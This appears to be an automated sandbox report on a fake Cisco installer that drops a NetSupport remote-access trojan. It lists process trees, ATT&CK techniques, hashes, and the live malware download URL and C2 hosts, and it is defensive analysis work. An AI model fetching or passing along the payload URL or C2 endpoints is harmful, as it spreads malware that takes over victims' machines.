Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_1101D180 SetRect,GetLocalTime,11_2_1101D180
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_1103B220 GetUserNameA,11_2_1103B220
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 12_2_68C5A220 _ftime64_s,_errno,_invalid_parameter_noinfo,_get_timezone,GetSystemTimeAsFileTime,GetTimeZoneInformation,_invoke_watson,_ftime64,12_2_68C5A220
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_1109D4A0
Source: C:\Windows\SysWOW64\wget.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: is-J44M9.tmp.6.dr | Binary or memory string: r?IsOs_WIN_VISTA@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: ?SetOperationPending@CCEvent@@QAEXXZm??0CCEvent@@QAE@AAJPAXW4EVENT_HANDLE_TYPE@0@PB_W@Zl?IsOs_WIN_7_Only@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: n?IsOs_WIN_8@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: ?SetConnectMessageType@CConnectIfcDataTLV@@QAEJG@Z}??0CConnectIfcDataTLV@@QAE@AAJAAVCIpcResponseInfo@@P6AJAAPAVIDataCrypt@@@Z@Z|??0CConnectIfcDataTLV@@QAE@AAJAAVCIpcMessage@@P6AJAAPAVIDataCrypt@@@Z@Zr?IsOs_WIN_VISTA@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: l?IsOs_WIN_7_Only@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: ?Run@CNetshCommand@@QAEPAVCNetshResponse@@AAJ@Zk?IsOs_WIN_7@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: ?Start@CThread@@QAEJXZn?IsOs_WIN_8@@YA_NXZ
Source: is-J44M9.tmp.6.dr | Binary or memory string: k?IsOs_WIN_7@@YA_NXZ
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_1106F210
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_689BA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,11_2_689BA980
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 12_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,12_2_1106F210
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 4288, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: client32.exe PID: 4252, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Network Sniffing | 12 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 3 Native API | 2 Valid Accounts | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 4 Obfuscated Files or Information | Security Account Manager | 1 System Service Discovery | SMB/Windows Admin Shares | 111 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 12 Process Injection | 11 Software Packing | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 3 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 1 Network Sniffing | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Masquerading | Cached Domain Credentials | 35 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 151 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Virtualization/Sandbox Evasion | Proc Filesystem | 2 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 2 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 3 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1546280
URL: https://asknetsupertech.com...
Startdate: 31/10/2024
Architecture: WINDOWS
Score: 100

Contacted: payiki.com, asknetsupertech.com, 2 other IPs or domains
Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Powershell drops NetSupport RAT client; 4 other signatures

Process tree:
- cmd.exe (started)
  - wget.exe (started)
    - DNS/IP: asknetsupertech.com 54.37.62.77, 443, 49755 OVH FR France
    - dropped: C:\Users\user\Desktop\...\CiscoSetup.exe, PE32
  - conhost.exe (started)
- CiscoSetup.exe (started)
  - dropped: C:\Users\user\AppData\...\CiscoSetup.tmp, PE32
  - CiscoSetup.tmp (started)
    - dropped: C:\Users\user\AppData\Local\...\cispn.ps1, ASCII
    - dropped: C:\Program Files (x86)\Cisco\unins000.dat, InnoSetup
    - dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
    - dropped: 96 other files (none is malicious)
    - signature: Bypasses PowerShell execution policy
    - powershell.exe (started)
      - dropped: C:\Users\user\AppData\...\remcmdstub.exe, PE32
      - dropped: C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32
      - dropped: C:\Users\user\AppData\...\client32.exe, PE32
      - dropped: 7 other files (6 malicious)
      - signature: Found suspicious powershell code related to unpacking or dynamic code loading
      - signature: Loading BitLocker PowerShell Module
      - signature: Powershell drops PE file
      - client32.exe (started)
        - DNS/IP: anyhowdo.com 199.188.200.195, 443, 49758 NAMECHEAP-NET US United States
        - DNS/IP: payiki.com 151.236.16.15, 443, 49756 HVC-AS US European Union
        - DNS/IP: geo.netsupportsoftware.com 172.67.68.212, 49757, 80 CLOUDFLARENET US United States
        - signature: Contains functionalty to change the wallpaper
        - signature: Contains functionality to register a low level keyboard hook
        - signature: Contains functionality to detect sleep reduction / modifications
      - conhost.exe (started)
- client32.exe (started)
- client32.exe (started)

                                  No Antivirus matches
Source | Detection | Scanner | Label | Link
                                  No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| asknetsupertech.com | 54.37.62.77 | true | true | | unknown |
| payiki.com | 151.236.16.15 | true | true | | unknown |
| geo.netsupportsoftware.com | 172.67.68.212 | true | false | | unknown |
| anyhowdo.com | 199.188.200.195 | true | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://151.236.16.15/fakeurl.htm | true | | unknown |
| http://geo.netsupportsoftware.com/location/loca.asp | false | | unknown |
| http://199.188.200.195/fakeurl.htm | true | | unknown |
| https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe | true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                http://www.pci.co.uk/supportclient32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://ocsp.quovadisoffshore.com14wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://sectigo.com/CPS0powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://curl.se/docs/http-cookies.htmlis-4ES8I.tmp.6.drfalse
                                                                                                                                          unknown
                                                                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.69141328382.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://ocsp.thawte.com0powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.immunet.com.CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://www.cisco.com/updateCiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://curl.se/docs/alt-svc.htmlis-4ES8I.tmp.6.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://127.0.0.1client32.exe, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.immunet.comAbyCiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.symauth.com/cps0(powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.symauth.com/rpa00powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.iminunet.comCiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.immunet.comis-K762I.tmp.6.dr, is-HNAJ2.tmp.6.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.69141328382.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeeDrivwget.exe, 00000002.00000002.68846552333.00000000012F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.cisco.com0is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.quovadis.bmwget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.quovadis.bm0wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://geo.netsupportsoftware.com/location/loca.asp5client32.exe, 0000000B.00000003.69437076663.00000000056F6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70083577485.00000000056F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://www.cisco.com/supportCiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.immunet.comAis-NL2AM.tmp.6.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
54.37.62.77 | asknetsupertech.com | France | 16276 | OVHFR | true
172.67.68.212 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
151.236.16.15 | payiki.com | European Union | 29802 | HVC-ASUS | true
199.188.200.195 | anyhowdo.com | United States | 22612 | NAMECHEAP-NETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546280
Start date and time: 2024-10-31 18:03:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: urldownload.jbs
Sample URL: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.win@14/539@4/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 143
• Number of non-executed functions: 213
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Execution Graph export aborted for target powershell.exe, PID 3588 because it is empty
• Execution Graph export aborted for target wget.exe, PID 4116 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
Time      Type             Description
13:05:54  API Interceptor  14x Sleep call for process: powershell.exe modified
13:06:27  API Interceptor  4920516x Sleep call for process: client32.exe modified
18:05:59  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
18:06:07  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4467816
                                                                                                                                                                                                  Entropy (8bit):6.598146073323608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                                                                                  MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                                                                                  SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                                                                                  SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                                                                                  SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):562280
                                                                                                                                                                                                  Entropy (8bit):5.250676972668652
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:E51t8uFDD2edf0sC3Yeba96ga8nXNBZeph17:O12uR2ec3Yijg/dB4ph17
                                                                                                                                                                                                  MD5:A942F7085CF6E0584943727A7B804342
                                                                                                                                                                                                  SHA1:C79F5A2946400942F75BB6D05A853D4018ED7419
                                                                                                                                                                                                  SHA-256:AB1ABBFB3F0AD6A0E16F8FC94F485C67A8AB002A5C05549CF676E4D701E26FF0
                                                                                                                                                                                                  SHA-512:69D42640785AA0B4FABBADD894A92643B4D32BC6FB404B0CCC0B056D8413ABD3684D81BED43D10CED24620BF26A749B4F87A557916F987501986DCA9980C0F44
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1134696
                                                                                                                                                                                                  Entropy (8bit):5.98101366214949
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:8h0jAkQkbL6TwyIHQ6KkuD/wNo9beiC3Yeba96ga8nXNBZy:8hAA7kbL6TwyIHQZ/wNf3Yijg/dBU
                                                                                                                                                                                                  MD5:5E20E06C6F8A52DF2A20F24BF8E7ED28
                                                                                                                                                                                                  SHA1:F43253FC29F72A6792A49F8499C8547328CB3060
                                                                                                                                                                                                  SHA-256:B2628E6B3620070511BC7BFD7EC75BF30F194D69560DC4925A2CB208EBFF8EA5
                                                                                                                                                                                                  SHA-512:06733AA3684278AD1E00F0F7070BED46698422104AA89E3563154A6477186F0DC34B4C6598B101941AB9C34055891CA1A697B8F233156953D09A184291018CBD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):297
                                                                                                                                                                                                  Entropy (8bit):4.260838473974518
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:3FHGzEGBX2WemHRSaiHaXQ0GshjQUoWyvNHiRCIrSa7V:1HTGBGXmHgak2uEiWygRgiV
                                                                                                                                                                                                  MD5:05BADC48F12BCC4CBF5B463321943D98
                                                                                                                                                                                                  SHA1:071138B7F1FFB97147891BA5A59C3C3B69FE4BD2
                                                                                                                                                                                                  SHA-256:9158CA8F1ECE84B45A80B9D43409A528B7D0493F38916A030876D70767C13630
                                                                                                                                                                                                  SHA-512:C1A0F2077676C37AD4B1AD5EAF4AB86BC9C516C82AD515B9A7E7A2A90D70080B2BC7CCC5E37C60F6C2D6A19775769AA8F610A91AFC1EE9F6358F941CF87976AD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "component" : [.. {.. "architecture" : "x86_64",.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "platform" : "windows",.. "type" : "component",.. "version" : "5.0.04021".. }.. ]..}..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1375
                                                                                                                                                                                                  Entropy (8bit):3.276910195764313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1HTGBAZ6x2XA7h/xmv2uEi+Yx7E36x2XAiB/xmv2uEi+Yx78vUsPRmOV6V:BRAj02uEi+hAO02uEi+zhZmOo
                                                                                                                                                                                                  MD5:565E42342B7C2AF14F371A39589C1B67
                                                                                                                                                                                                  SHA1:DAB8871D9D3C5E565D40437FF366D944C1E51661
                                                                                                                                                                                                  SHA-256:13DDFA583A7C4A29EF617887C77AA4E3DA998F52F76D91E83C57B2D38192F555
                                                                                                                                                                                                  SHA-512:8F21388EA0BCD76ECCA88DEA5ED7292E64A0CC7BBA285272B02942D868E92ECB701D9ECBE2C172A87AF06FB16EA5DD2513075792ECB3556DC09C08A8CB4B7FD5
